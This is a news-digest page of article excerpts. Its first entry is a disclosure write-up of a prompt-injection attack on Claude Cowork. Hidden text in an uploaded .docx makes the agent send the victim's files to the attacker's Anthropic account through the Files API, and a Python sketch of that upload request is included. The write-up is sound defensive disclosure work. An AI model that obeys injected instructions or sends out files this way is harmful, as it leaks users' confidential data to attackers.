10 interesting stories served every morning and every evening.




1 832 shares, 30 trendiness

Claude Cowork Exfiltrates Files

Two days ago, Anthropic released the Claude Cowork research preview (a general-purpose AI agent to help anyone with their day-to-day work). In this article, we demonstrate how attackers can exfiltrate user files from Cowork by exploiting an unremediated vulnerability in Claude's coding environment, which now extends to Cowork. The vulnerability was first identified and disclosed by Johann Rehberger in Claude.ai chat, before Cowork existed; it was acknowledged but not remediated by Anthropic.

Anthropic warns users, "Cowork is a research preview with unique risks due to its agentic nature and internet access." Users are advised to be aware of "suspicious actions that may indicate prompt injection". However, as this feature is intended for use by the general populace, not just technical users, we agree with Simon Willison's take:

"I do not think it is fair to tell regular non-programmer users to watch out for 'suspicious actions that may indicate prompt injection'!"

As Anthropic has acknowledged this risk and put it on users to avoid granting access to "local files with sensitive information" (while simultaneously encouraging the use of Cowork to organize your Desktop), we have chosen to publicly disclose this demonstration of a threat users should be aware of. By raising awareness, we hope to enable users to better identify the types of 'suspicious actions' mentioned in Anthropic's warning.

This attack leverages the allowlisting of the Anthropic API to achieve data egress from Claude's VM environment (which restricts most network access).

The victim connects Cowork to a local folder containing confidential real estate files. The victim then uploads a file to Claude that contains a hidden prompt injection.

For general use cases, this is quite common; a user finds a file online that they upload to Claude. This attack is not dependent on the injection source - other injection sources include, but are not limited to, web data from Claude for Chrome, connected MCP servers, etc. In this case, the injected file is a 'Claude Skill' (although, as mentioned, it could also just be a regular document), as Skills are a generalizable file convention that users are likely to encounter, especially when using Claude.

Note: If you are familiar with Skills, they are canonically Markdown files (which users often do not heavily scrutinize). However, we demonstrate something more interesting: here, the user uploads a .docx (such as may be shared on an online forum) that poses as a Skill - the contents appear to be Markdown that was simply saved after editing in Word. In reality, this trick allows attackers to conceal the injection using 1-point font, white-on-white text, and line spacing set to 0.1 — making it effectively impossible to detect.

The victim asks Cowork to analyze their files using the 'Real Estate skill' they uploaded. The injection manipulates Cowork into uploading files to the attacker's Anthropic account.

The injection tells Claude to use a 'curl' command to make a request to the Anthropic file upload API with the largest available file. The injection then provides the attacker's API key, so the file will be uploaded to the attacker's account.
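To make that pattern easier to recognize in a 'Running command' block, here is a minimal sketch of what such an upload request looks like, based on Anthropic's publicly documented Files API. It is written in Python rather than curl, and the API key and file path are placeholders, not values from the demonstration.

```python
# Illustrative only: the general shape of an Anthropic Files API upload,
# shown so the pattern is recognizable if it appears in an agent's command
# output. Endpoint and headers follow the public Files API documentation;
# the key and file path below are placeholders.
import requests

API_KEY = "sk-ant-REDACTED"  # placeholder; in the attack this is the attacker's key

with open("confidential-spreadsheet.xlsx", "rb") as f:  # hypothetical victim file
    resp = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",
        },
        files={"file": f},
    )

print(resp.status_code, resp.json())
```

The key tell is the combination of destination and credential: an api.anthropic.com upload paired with an API key that did not come from the user's own configuration.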

At no point in this process is human approval required. If we expand the 'Running command' block, we can see the malicious request in detail. Code executed by Claude is run in a VM - restricting outbound network requests to almost all domains - but the Anthropic API flies under the radar as trusted, allowing this attack to complete successfully. The attacker's account then contains the victim's file, allowing them to chat with it. The exfiltrated file contains financial figures and PII, including partial SSNs.

The above exploit was demonstrated against Claude Haiku. Although Claude Opus 4.5 is known to be more resilient against injections, Opus 4.5 in Cowork was successfully manipulated via indirect prompt injection to leverage the same file upload vulnerability and exfiltrate data, in a test that considered a 'user' uploading a malicious integration guide while developing a new AI tool:

As the focus of this article is everyday users (not developers), we opted to demonstrate the above attack chain instead of this one.

An interesting finding: Claude's API struggles when a file does not match the type it claims to be. When operating on a malformed PDF (it ends in .pdf, but is really a text file with a few sentences in it), after trying to read it once, Claude starts throwing an API error in every subsequent chat in the conversation.

We posit that it is likely possible to exploit this failure via indirect prompt injection to cause a limited denial-of-service attack (e.g., an injection can elicit Claude to create a malformed file and then read it). Uploading the malformed file via the Files API resulted in notifications with an error message, both in the Claude client and the Anthropic Console.

One of the key capabilities that Cowork was created for is the ability to interact with one's entire day-to-day work environment. This includes the browser and MCP servers, granting capabilities like sending texts, controlling one's Mac with AppleScripts, etc.

These functionalities make it increasingly likely that the model will process both sensitive and untrusted data sources (which the user does not review manually for injections), making prompt injection an ever-growing attack surface. We urge users to exercise caution when configuring Connectors. Though this article demonstrated an exploit without leveraging Connectors, we believe they represent a major risk surface likely to impact everyday users.

...

Read the original on www.promptarmor.com »

2 724 shares, 43 trendiness

CreepyLink

The URL shortener that makes your links look as suspicious as possible.

Normal links are too trustworthy. Make them creepy.

...

Read the original on creepylink.com »

3 541 shares, 64 trendiness

The Palantir App ICE Uses to Find Neighborhoods to Raid

Palantir is working on a tool for Immigration and Customs Enforcement (ICE) that populates a map with potential deportation targets, brings up a dossier on each person, and provides a "confidence score" on the person's current address, 404 Media has learned. ICE is using it to find locations where lots of people it might detain could be based.

The findings, based on internal ICE material obtained by 404 Media, public procurement records, and recent sworn testimony from an ICE official, show the clearest link yet between the technological infrastructure Palantir is building for ICE and the agency's activities on the ground. The tool receives people's addresses from the Department of Health and Human Services (HHS), among a range of other sources, according to the material.

The news comes after Department of Homeland Security (DHS) head Kristi Noem said the agency is sending hundreds more federal agents to Minneapolis amid widespread protests against the agency. Last week ICE officer Jonathan Ross shot and killed 37-year-old U.S. citizen Renee Nicole Good. During Operation Metro Surge, which DHS calls "the largest immigration operation ever," immigration agents have surrounded rideshare drivers and used pepper spray on high school students.

...

Read the original on www.404media.co »

4 402 shares, 73 trendiness

Apple is Fighting for TSMC Capacity as Nvidia Takes Center Stage

When CC Wei visited Cupertino last August, he had bad news for his largest client. Apple would need to acquiesce to the largest price rise in years, TSMC's CEO told its executives.

Tim Cook and his team took the news on the chin. Wei had been telegraphing hikes in earnings calls over the past few quarters, and the Taiwanese chip maker's rising gross margins were testament to its increasing pricing power.

That wasn't the worst news, my sources tell me.

Apple, which once held a dominant position on TSMC's customer list, now needs to fight for production capacity. With the continuing AI boom, and each GPU from clients like Nvidia and AMD taking up a larger footprint per wafer, the iPhone maker's chip designs are no longer guaranteed a place among TSMC's almost two dozen fabs.

What Wei probably didn't tell Cook is that Apple may no longer be his largest client.

According to Culpium analysis and discussions with sources in the supply chain, Nvidia likely took the top spot in at least one or two quarters of last year. "We don't discuss that," Chief Financial Officer Wendell Huang told Culpium Thursday when asked about the change in client rankings.

Final data will be unveiled in a few months when TSMC releases its annual report — which includes revenue from its top clients — but there's every chance that Apple's lead for the full year narrowed significantly, and its total may even have fallen below Nvidia's. If it didn't happen in 2025, then it's almost certain to do so in 2026, my sources tell me.

TSMC's revenue climbed 36% last year to $122 billion, it reported Thursday. Nvidia's sales for the fiscal year through January 2026 are set to climb 62%, while Apple's product revenue — which excludes services — is on track to grow just 3.6% for the 12 months to December 2025, according to Culpium estimates based on earnings reports and company guidance.

Apple's role as the primary driver of TSMC revenue growth ended five years ago. In 2018 TSMC sales would have even fallen if not for incremental purchases by Apple that year. Now, the Cupertino company is posting low single-digit revenue growth while Nvidia is skyrocketing.

The reason for this change is two-fold, and pretty obvious: AI is driving massive demand for high-powered chips, while the smartphone boom has plateaued.

TSMC's sales from high-performance computing, which includes AI chips, climbed 48% last year on top of 58% growth the year before. Smartphone revenue climbed just 11%, slower than 23% in the prior year. That trend will continue this year, and for the foreseeable future.

Revenue in 2026 will rise close to 30%, yet capital expenditure will climb around 32% to a record of somewhere between $52 billion and $56 billion, TSMC said Thursday. Longer term, growth will average 25% in the five years through 2029, yet the AI segment will climb an average of 55% or more over the same period, the company said. That's higher than a prior forecast for a mid-40 percent figure.

The ultimate flex for TSMC came Thursday when it showed off not only record revenue and net income, but a gross margin approaching that of software makers and fabless chip designers. In the December quarter, that figure was an astounding 62.3%, 280 basis points higher than the prior period. If not for its overseas fabs (Arizona and Japan), gross margin would have been even higher.

There are two important caveats. First, while smartphone processors are the largest portion of chips bought by Apple, they're not the only type. Processors for Macs come under HPC, while Apple also has a strong lineup of custom chips used in accessories, which fall under digital consumer electronics. Second, Nvidia isn't the only HPC client. AMD is a major buyer of capacity for its own GPUs, while Amazon and Google are on the growing list of customers developing in-house AI chips.

Put another way, Apple's chip catalog is broader and more varied, while Nvidia's lineup is more concentrated around a huge number of wafers at, or near, the leading edge. It's for these reasons that Apple will remain important for at least another decade.

In the near term, however, TSMC's technology roadmap, coupled with broader industry trends, favors Nvidia, AMD, and their ilk, meaning Apple may need to keep fighting for capacity over the next year or two.

TSMC is already producing chips in volume at 2 nanometers (called N2), currently its most advanced node, with Apple a major buyer. But in the second half of this year it's set to ramp up both a new variant called N2P and a new node called A16.

The company's business model is a little quirky. Instead of repurposing an existing factory for new technology, TSMC just builds a new one. This ensures no interruption to output and allows it to squeeze the most out of old tools and processes. In general, this means any new capacity that TSMC builds is for a new node. As a result, it has numerous fabs still churning out chips on technology that's a decade old or more.

In TSMC CEO CC Wei's words, "A16, with Super Power Rail, is best for HPC with complex signal routes." SPR is TSMC's version of backside power, a newer approach designed to separate a chip's signal from its power supply. Intel is also developing this technology, and many believe it'll be the key to the US company's prospects of stealing foundry share from its Taiwan rival.

After that, TSMC has A14, which it expects to bring into volume production around 2028. Some call this the next full node after N2, labeling A16 as "not a full node." In truth, all of these names are as much marketing terms as they are technology designators. Nevertheless, as SemiAnalysis recently wrote in a fabulous report on the TSMC-Apple relationship, "the balance will shift back to Apple because A14 is designed for both mobile and HPC from the start."

More importantly, what Apple offers is stability. Nvidia has been a client for a lot longer than Apple, but broadly speaking it's a bit niche. Right now that "niche" is the hottest product on the planet, but niche it is. Apple, on the other hand, has products being made in no fewer than a dozen TSMC fabs. Even if Nvidia did overtake Apple by purchases, the breadth of its manufacturing footprint at TSMC is nowhere near as large.

This distinction may not matter now, but it probably will at some point. The AI boom won't last forever. The bubble may burst, or it may slowly deflate, but the growth trajectory will surely flatten, and that means demand for leading-edge AI chips will fall.

Wei knows this, which is why he's expanding quickly yet cautiously. "I am also very nervous," he said at the company's investor conference on Thursday in Taipei. "If we didn't do it carefully, it would be a big disaster for TSMC for sure."

The chip giant has recently come under fire, including from noted analyst Benedict Evans, for being "unwilling/unable to expand capacity fast enough to meet Nvidia's book." I think this is wrong, and unfair.

"The risk of under-investing is significantly greater than the risk of over-investing," Evans cited Google CEO Sundar Pichai as saying back in 2Q 2024, as if to make the point. TSMC and Alphabet, Google's parent, have approximately the same gross margin. But their business models couldn't be more different. Nvidia's financials are also unlike TSMC's. Their respective capex strategies need to reflect this risk.

Alphabet's capital intensity, calculated as acquisitions of property, plant & equipment divided by revenue, was just 15% for full-year 2024. TSMC's is more than double that, at over 33%. More importantly, depreciation — which is where the cost of capex is reflected in earnings — was just 10% of Alphabet's cost of revenue. For TSMC, this figure is more than four times higher, at 45%.

At Nvidia, which is a tier-one buyer of TSMC's output, the data is more stark. Capital intensity was just 2.5% for 2024, while depreciation was only 5.7% of the cost of revenue. As a fabless chipmaker, it can enjoy gross margins of over 70%. Its only real risk is holding excess inventory. Even then, it could have written off its entire inventory at the end of October and still have maintained a gross margin approaching that of its chief supplier. What's more, neither of these clients has anywhere near the customer-concentration risk of TSMC.

The complaint that TSMC could and should build faster ignores the fact that it's the one left holding the baby if a downturn comes and demand falls. It takes two to three years to build a new fab, Wei explained, so the company must skate to where the puck is going without thinking too much about where it's been. "Even if we spend 52 to 56 billion this year, the contribution this year is none," Wei said Thursday. Its major cost, buying equipment, remains on the books no matter what revenue it brings in for the quarter.

For the best part of a decade, Apple was the one driving TSMC's need to keep spending on new facilities. Today it's Nvidia, and Jensen Huang is starting to wield more power than Tim Cook. But neither has to bother with the expensive business of actually manufacturing semiconductors, merely the hassle of begging CC Wei for wafers.

For such clients, the foundry's capacity is a fixed cost that they needn't worry about. Which is precisely why eight of the world's ten largest companies turn to TSMC to make their chips, and in return the Taiwanese giant gets to reap the rewards during boom times like this.

...

Read the original on www.culpium.com »

5 318 shares, 30 trendiness

Photos Capture the Breathtaking Scale of China's Wind and Solar Buildout

Last year China installed more than half of all wind and solar added globally. In May alone, it added enough renewable energy to power Poland, installing solar panels at a rate of roughly 100 every second.

The massive buildout is happening across the country, from crowded eastern cities increasingly topped by rooftop solar panels to remote western deserts where colossal wind farms sprawl across the landscape.

"From the ground, it's hard to grasp the scale of these power plants," said Chinese photographer Weimin Chu. "But when you rise into the air, you can see the geometry, the rhythm — and their relationship with the mountains, the desert, the sea."

Chu has spent three years capturing the shift underway, using drones to photograph power plants from overhead. His work, which draws from the visual language of traditional Chinese ink paintings, was featured last year in an award-winning exhibition presented by Greenpeace. A selection of those photos is reproduced here.

"I started out just shooting landscapes," Chu said. "But when I traveled to places like Guizhou, Yunnan, and Qinghai in 2022, I kept seeing wind farms and solar power plants appear in my camera frame. I realized this is the story of our time — and almost no one is documenting it in a systematic way."

...

Read the original on e360.yale.edu »

6 301 shares, 29 trendiness

To those who fired or didn't hire tech writers because of AI

Yes, you, who are thinking about not hiring a technical writer this year or, worse, erased one or more technical writing positions last year because of AI. You, who are buying into the promise of docs entirely authored by LLMs without expert oversight or guidance. You, who unloaded the weight of docs on your devs' shoulders, as if it was a trivial chore.

You are making a big mistake. But you can still undo the damage.

It's been a complicated year, 2025. When even Andrej Karpathy, one of OpenAI's founders, admits, in a fit of Oppenheimerian guilt, to feeling lost, you know that no one holds the key to the future. You flail and dance around these new totems made of words, which are neither intelligent nor conscious, pretending they can replace humans while, in fact, they're little more than glorified tools.

You might think that the plausible taste of AI prose is all you need to give your products a voice. You paste code into a field and something that resembles docs comes out after a few minutes. Like a student eager to turn homework in, you might be tempted to content yourself with docs theatre, thinking that it'll earn you a good grade. It won't, because docs aren't just artifacts.

You keep using that word. I do not think it means what you think it means

When you say "docs", you're careful to focus on the output, omitting the process. Perhaps you don't know how docs are produced. You've forgotten, or perhaps never knew, that docs are product truth; that without them, software becomes unusable, because software is never done, is never obvious, and is never simple. Producing those docs requires tech writers.

Tech writers go to great lengths to get the information they need. They write so that your audience can understand. They hunger for clarity and meaning and impact. They power through weeks full of deadlines, chasing product news, because without their reporting, most products wouldn't thrive; some wouldn't even exist. Their docs aren't a byproduct: they tie the product together.

An LLM can't do all that, because it can't feel the pain of your users. It can't put itself into their shoes. It lacks the kind of empathy that's behind great help content. It does not, in fact, have any empathy at all, because it cannot care. You need folks who will care, because content is a hairy beast that can only be tamed by agents made of flesh and capable of emotions: humans.

You can't generate docs on autopilot. Let me tell you why.

First, AI-generated docs are not intelligent. They not only make up things in subtle ways: they lack vision. Even if you fed them millions of tokens, they couldn't develop a docs strategy, decide what not to document, or structure content for reuse. And they fail to capture the tension, the caveats, the edge cases, the feeling of unfinishedness that only someone who cares can feel. Without that grounding, docs are hollow.

Second, liability doesn't vanish just because AI wrote it. When docs cause harm through wrong instructions, someone will be held responsible. It won't be the model. You can't depose an LLM. You can't fire it. You can't point at it in court when a customer's data evaporates because your GenAI runbook told them to run the wrong command. That someone will be you, or someone who reports to you.

Third, even your favorite AI must RTFM. All your Claude Skills, Cursor rules, all the semantic tagging that makes RAG work, is technical writing under a new name: context curation. You fired or didn't hire the people who create high-quality context and then wondered why your AI tools produce slop. You can't augment what isn't there. The writers you let go were the supply chain for the intelligence you're now betting on.

It's not all bad news: marvelous things can happen if you provide your writers with AI tools and training while you protect the quality of your content through an AI policy. I've described the ideal end state in My day as an augmented technical writer in 2030, a vision of the future where writers orchestrate, edit, and publish docs together with AI agents. This is already happening before our eyes.

Productivity gains are real when you understand that augmentation is better than replacing humans, a reality that even AWS CEO Matt Garman has acknowledged. Read how I'm using AI as a technical writer. I'm not alone: follow Tom Johnson, CT Smith, and Sarah Deaton, and discover how tech writers are building tools through AI to better apply it to docs.

Develop an AI strategy for docs together with tech writers, and give them time and resources to experiment with AI. Tech writers are resourceful by nature: they've spent careers doing more with less, optimizing workflows, finding clever solutions to impossible quests. Give them the tools and a bit of runway, and they'll figure out how to make AI work for the docs, not instead of them.

Reconsider the positions you did not open. Or the writers you let go. Reconsider the assumption that AI has solved a problem that, at its core, is deeply human and requires not only concatenating words, but also chasing subject-matter experts and understanding the subtleties of product motions, among many other things.

Technical writers aren't a luxury. They are the people who translate what you've built into something others can use. Without them, you're shipping a product that can't speak for itself, or that lies. Your product needs to speak. AI can generate noise effectively and infinitely, but only a technical writer can create the signal.

Don't choose the noise. Get them back. Get them onboard.

Thanks to Tiffany Hrabusa, Casey Smith, and Anna Urbiztondo for their reviews of early drafts and for their encouragement. Thanks to my partner, Valentina, for helping me improve this piece and for suggesting to wait a bit before hitting Publish. And a heartfelt thank you to the tech writing community and its wonderful human beings.

For a standalone version of this letter, use https://passo.uno/reconsider/.

...

Read the original on passo.uno »

7 262 shares, 10 trendiness

Scaling long-running autonomous coding

We've been experimenting with running coding agents autonomously for weeks.

Our goal is to understand how far we can push the frontier of agentic coding for projects that typically take human teams months to complete.

This post describes what we've learned from running hundreds of concurrent agents on a single project, coordinating their work, and watching them write over a million lines of code and consume trillions of tokens.

Today's agents work well for focused tasks, but are slow for complex projects. The natural next step is to run multiple agents in parallel, but figuring out how to coordinate them is challenging.

Our first instinct was that planning ahead would be too rigid. The path through a large project is ambiguous, and the right division of work isn't obvious at the start. We began with dynamic coordination, where agents decide what to do based on what others are currently doing.

Our initial approach gave agents equal status and let them self-coordinate through a shared file. Each agent would check what others were doing, claim a task, and update its status. To prevent two agents from grabbing the same task, we used a locking mechanism.

Agents would hold locks for too long, or forget to release them entirely. Even when locking worked correctly, it became a bottleneck. Twenty agents would slow down to the effective throughput of two or three, with most time spent waiting.

The system was brittle: agents could fail while holding locks, try to acquire locks they already held, or update the coordination file without acquiring the lock at all.

We tried replacing locks with optimistic concurrency control. Agents could read state freely, but writes would fail if the state had changed since they last read it. This was simpler and more robust, but there were still deeper problems.
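To make the mechanism concrete, here is a minimal sketch of that optimistic-concurrency pattern over a shared coordination file. The JSON schema (a version counter plus a task map) and the file name are hypothetical illustrations, not Cursor's actual implementation, and a real system would need the final check-and-write step to be atomic (for example, a conditional database update or an atomic rename), which this sketch elides.

```python
# Minimal sketch of optimistic concurrency control over a shared JSON file.
# The schema and file name are hypothetical; only the read-check-write
# pattern matters. In a real system the version check plus write below
# must itself be atomic, which this sketch does not guarantee.
import json

STATE_FILE = "coordination.json"  # illustrative path


def read_state():
    with open(STATE_FILE) as f:
        return json.load(f)  # e.g. {"version": 7, "tasks": {...}}


def write_if_unchanged(expected_version, new_state):
    """Write new_state only if nobody bumped the version since we read it."""
    current = read_state()
    if current["version"] != expected_version:
        return False  # stale read: the caller re-reads and retries
    new_state["version"] = expected_version + 1
    with open(STATE_FILE, "w") as f:
        json.dump(new_state, f)
    return True


def claim_task(agent_id, task_id):
    """Attempt to claim a task without ever taking a lock."""
    state = read_state()
    if state["tasks"].get(task_id, {}).get("owner"):
        return False  # someone already owns this task
    state["tasks"][task_id] = {"owner": agent_id, "status": "in_progress"}
    return write_if_unchanged(state["version"], state)
```

Compared with locking, a failed write costs only a retry; no agent can stall the others by holding a lock it forgot to release.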

With no hierarchy, agents became risk-averse. They avoided difficult tasks and made small, safe changes instead. No agent took responsibility for hard problems or end-to-end implementation. This led to work churning for long periods of time without progress.

Our next approach was to separate roles. Instead of a flat structure where every agent does everything, we created a pipeline with distinct responsibilities.

Planners continuously explore the codebase and create tasks. They can spawn sub-planners for specific areas, making planning itself parallel and recursive.

Workers pick up tasks and focus entirely on completing them. They don't coordinate with other workers or worry about the big picture. They just grind on their assigned task until it's done, then push their changes.

At the end of each cycle, a judge agent determines whether to continue, and then the next iteration starts fresh. This solved most of our coordination problems and let us scale to very large projects without any single agent getting tunnel vision.
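As a rough sketch, the cycle described above might be wired together like this; the function names, thread pool, and single-process loop are hypothetical simplifications standing in for calls to real coding agents, not Cursor's actual harness.

```python
# Hypothetical, single-process sketch of the planner -> workers -> judge cycle.
# The three role functions are placeholders for coding-agent calls; a thread
# pool stands in for hundreds of concurrent workers pushing to a shared repo.
from concurrent.futures import ThreadPoolExecutor


def plan(codebase):
    """Planner role: explore the codebase and emit task descriptions."""
    return [f"task-{i}" for i in range(20)]  # placeholder tasks


def work(task):
    """Worker role: grind on one task until done, then push the change."""
    return {"task": task, "status": "done"}  # placeholder result


def judge(results):
    """Judge role: decide whether another cycle is worth running."""
    return any(r["status"] != "done" for r in results)  # placeholder criterion


def run_pipeline(codebase, max_cycles=10, num_workers=8):
    for _ in range(max_cycles):
        tasks = plan(codebase)
        with ThreadPoolExecutor(max_workers=num_workers) as pool:
            results = list(pool.map(work, tasks))
        if not judge(results):
            break  # judge decides the goal is met or progress has stalled
        # the next iteration starts fresh, which combats drift and tunnel vision


if __name__ == "__main__":
    run_pipeline(codebase=".")
```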

To test this system, we pointed it at an ambitious goal: building a web browser from scratch. The agents ran for close to a week, writing over 1 million lines of code across 1,000 files. You can explore the source code on GitHub.

Despite the codebase size, new agents can still understand it and make meaningful progress. Hundreds of workers run concurrently, pushing to the same branch with minimal conflicts.

While it might seem like a simple screenshot, building a browser from scratch is extremely difficult.

Another experiment was an in-place migration from Solid to React in the Cursor codebase. It took over 3 weeks, with +266K/-193K edits. As we've started to test the changes, we do believe it's possible to merge this change.

Another experiment was to improve an upcoming product. A long-running agent made video rendering 25x faster with an efficient Rust version. It also added support for zooming and panning smoothly, with natural spring transitions and motion blur, following the cursor. This code was merged and will be in production soon.

We have a few other interesting examples still running:

We've deployed billions of tokens across these agents toward a single goal. The system isn't perfectly efficient, but it's far more effective than we expected.

Model choice matters for extremely long-running tasks. We found that GPT-5.2 models are much better at extended autonomous work: following instructions, keeping focus, avoiding drift, and implementing things precisely and completely.

Opus 4.5 tends to stop earlier and take shortcuts when convenient, yielding back control quickly. We also found that different models excel at different roles. GPT-5.2 is a better planner than GPT-5.1-codex, even though the latter is trained specifically for coding. We now use the model best suited for each role rather than one universal model.

Many of our improvements came from removing complexity rather than adding it. We initially built an integrator role for quality control and conflict resolution, but found it created more bottlenecks than it solved. Workers were already capable of handling conflicts themselves.

The best system is often simpler than you'd expect. We initially tried to borrow patterns from distributed computing and organizational design. However, not all of them work for agents.

The right amount of structure is somewhere in the middle. Too little structure and agents conflict, duplicate work, and drift. Too much structure creates fragility.

A surprising amount of the system's behavior comes down to how we prompt the agents. Getting them to coordinate well, avoid pathological behaviors, and maintain focus over long periods required extensive experimentation. The harness and models matter, but the prompts matter more.

Multi-agent coordination remains a hard problem. Our current system works, but we're nowhere near optimal. Planners should wake up when their tasks complete to plan the next step. Agents occasionally run for far too long. We still need periodic fresh starts to combat drift and tunnel vision.

But the core question (can we scale autonomous coding by throwing more agents at a problem?) has a more optimistic answer than we expected. Hundreds of agents can work together on a single codebase for weeks, making real progress on ambitious projects.

The techniques we're developing here will eventually inform Cursor's agent capabilities. If you're interested in working on the hardest problems in AI-assisted software development, we'd love to hear from you at hiring@cursor.com.

...

Read the original on cursor.com »

8 243 shares, 8 trendiness

The Influentists

Last week, the developer community was busy discussing a single tweet:

I'm not joking and this isn't funny. We have been trying to build distributed agent orchestrators at Google since last year. There are various options, not everyone is aligned… I gave Claude Code a description of the problem, it generated what we built last year in an hour.— Jaana Dogan ヤナ ドガン (@rakyll) January 2, 2026

The author is Jaana Dogan (known as Rakyll), a highly respected figure in the Google ecosystem, in the open-source world, and in my heart (thank you Rakyll for your great Go blog posts).

At first glance, the tweet suggests an enormous shift in the software industry: the ability to build in just one hour what previously required weeks or months for a team of software engineers, using just a description of the problem. The tweet was overly dramatic in my opinion, but actually impressive!

The post triggered an immediate wave of "doom-posting," with many fearing for the future of software engineering (as has happened every week for the past year). However, as the conversation reached a high number of replies and citations on social networks, Rakyll released a follow-up thread to provide context:

To cut through the noise on this topic, it's helpful to provide more context:

- We have built several versions of this system last year.
- There are tradeoffs and there hasn't been a clear winner.

- When prompted with the best ideas that survived, coding agents are able to… https://t.co/k5FvAah7yc— Jaana Dogan ヤナ ドガン (@rakyll) January 4, 2026

This response thread revealed a story far less miraculous than the original tweet suggested. Let's analyze it.

Crucially, the foundational "thinking" had already been performed by Rakyll herself, who guided the AI using architectural concepts (honed over several weeks or months of prior effort), rather than the AI thinking and inventing "the product" from scratch.

Furthermore, the resulting project was strictly a proof of concept that falls far short of a production-ready system capable of managing real-world complexity.

And finally, this success hinged on Rakyll's implicit domain knowledge and deep expertise. The last point is often (strategically?) omitted from these "magic" viral demonstrations in order to make the tool appear way more autonomous than it truly is.

Hmm. Now, this is far less exciting…

This pattern of "hype first and context later" is actually part of a growing trend.

I call the individuals participating in that trend "The Influentists". Those people are members of a scientific or technical community, and leverage their large audiences to propagate claims that are, at best, unproven and, at worst, intentionally misleading.

But how can we spot them?

I personally identify these "Influentists" by four personality traits that characterize their public discourse.

The first is a reliance on "trust-me-bro" culture, where anecdotal experiences are framed as universal, objective truths to generate hype. This is a sentiment perfectly captured by the "I'm not joking and this isn't funny" tone of Rakyll's original tweet, but also by the dramatic "I've never felt that much behind as a programmer" from Andrej Karpathy's tweet. This is supported by an absence of reproducible proof, as these individuals rarely share the code, data, or methodology behind their viral "wins", an omission made easier than ever in the current LLM era. And finally, they utilize strategic ambiguity, carefully wording their claims with enough vagueness to pivot toward a "clarification" if the technical community challenges their accuracy.

I've never felt this much behind as a programmer. The profession is being dramatically refactored as the bits contributed by the programmer are increasingly sparse and between. I have a sense that I could be 10X more powerful if I just properly string together what has become…— Andrej Karpathy (@karpathy) December 26, 2025

Rakyll is far from alone. We see this "hype-first" approach across major AI firms like Anthropic, OpenAI, or Microsoft.

Consider Galen Hunt, a Distinguished Engineer at Microsoft. He recently made waves by claiming a goal to rewrite Microsoft's massive C/C++ codebases into Rust by 2030 using AI.

When the industry pointed out the near-impossible complexity of this task, and asked for clarity regarding popular and critical products like Microsoft Windows, he was forced to clarify that it was only a "research project".

Similarly, engineers from Anthropic and OpenAI often post teasers about "AGI being achieved internally", only to release, months later, models that disappoint the crowd.

Wait, can we consider seriously the hypothesis that 1) the recent hyped tweets from OA's staff

2) "AGI has been achieved internally"

3) sama's comments on the qualification of slow or fast takeoff hinging on the date you count from

4) sama's comments on 10000x researchers

are… https://t.co/f57g7dXMhM pic.twitter.com/Gap3V7VqkK— Siméon (@Simeon_Cps) September 24, 2023

Liam, I have been a professional programmer for 36 years. I spent 11 years at Google, where I ended up as a Staff Software Engineer, and now work at Anthropic. I've worked with some incredible people - you might have heard of Jaegeuk Kim or Ted Ts'o - and some ridiculously… https://t.co/Ku8agTrps3— Paul Crowley (@ciphergoth) December 31, 2025

Similarly, many other companies lie about what they are solving or are willing to solve:

When leaders at major labs propagate these hype-based results, it can create a "technical debt of expectations" for the rest of us. Junior developers see these viral threads and feel they are failing because they can't reproduce a year of work in an hour, not realizing the "magic" was actually a highly curated prototype guided by a decade of hidden expertise.

We must stop granting automatic authority to those who rely on hype, or vibes, rather than evidence.

If a tool or methodology were truly as revolutionary as claimed, then it wouldn't need a viral thread to prove its worth, because the results would speak for themselves.

The tech community must shift its admiration back toward reproducible results and away from this "trust-me-bro" culture.

...

Read the original on carette.xyz »

9 230 shares, 19 trendiness

Raspberry Pi's new AI HAT adds 8GB of RAM for local LLMs

Today Raspberry Pi launched their new $130 AI HAT+ 2, which includes a Hailo 10H and 8 GB of LPDDR4X RAM.

With that, the Hailo 10H is capable of running LLMs entirely standalone, freeing the Pi's CPU and system RAM for other tasks. The chip runs at a maximum of 3W, with 40 TOPS of INT8 NPU inference performance in addition to the equivalent 26 TOPS INT4 machine vision performance on the earlier AI HAT with Hailo 8.

In practice, it's not as amazing as it sounds.

You still can't upgrade the RAM on the Pi, but at least this way, if you do have a need for an AI coprocessor, you don't have to eat up the Pi's memory to run things on it.

And it's a lot cheaper and more compact than running an eGPU on a Pi. In that sense, it's more useful than the silly NPUs Microsoft forces into their 'AI PCs'.

But it's still a solution in search of a problem, in all but the most niche of use cases.

Besides feeling like I'm living in the world of the Turbo Encabulator every time I'm testing AI hardware, I find the marketing of these things to be very vague, and the applications not very broad.

For example, the Hailo 10H is advertised as being used for a Fujitsu demo of automatic shrink detection for a self-checkout.

That's certainly not a worthless use case, but it's not something I've ever needed to do. I have a feeling this board is meant more for development, for people who want to deploy the 10H in other devices, rather than as a total solution to problems individual Pi owners need to solve.

Especially when it comes to the headline feature: running inference, like with LLMs.

I also published a video with all the information in this blog post, but if you enjoy text more than video, scroll on past—it doesn't offend me!

I ran everything on an 8 gig Pi 5, so I could get an apples-to-apples comparison, running the same models on the Pi's CPU as I did on the AI HAT's NPU.

They both have the same 8GB LPDDR4X RAM configuration, so ideally, they'd have similar performance.

I tested every model Hailo put out so far, and compared them, Pi 5 versus Hailo 10H:

The Hailo is only close, really, on Qwen2.5 Coder 1.5B.

It is slightly more efficient in most cases:

But looking more closely at power draw, we can see why the Hailo doesn't keep up:

The Pi's CPU is allowed to max out its power limits (10W on the SoC), which are a lot higher than the Hailo's (3W).

So power holds it back, but the 8 gigs of RAM holds back the LLM use case (versus just running on the Pi's CPU) the most. The Pi 5 can be bought in up to a 16 GB configuration. That's as much as you get in decent consumer graphics cards.

Because of that, many quantized medium-size models target 10-12 GB of RAM usage (leaving space for context, which eats up another 2+ GB of RAM).

A couple weeks ago, ByteShape got Qwen3 30B A3B Instruct to fit on a 16GB Pi 5. Now this post isn't about LLMs, but the short of it is they found a novel way to compress the model to fit in 10 GB of RAM.

A little bit of quality is lost, but like a JPEG, it's still good enough to ace all the contrived tests (like building a TODO list app, or sorting a complex list) that the tiny models I ran on the Hailo 10H didn't complete well (see the video earlier in this post for details).

To test the 30B model, I installed llama.cpp following this guide from my blog, and downloaded the compressed model.
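If you want to script the same kind of test rather than use the llama.cpp CLI, a rough sketch with the llama-cpp-python bindings is below; the model filename is a placeholder for whichever compressed GGUF you download, and the settings are illustrative rather than the exact ones used here.

```python
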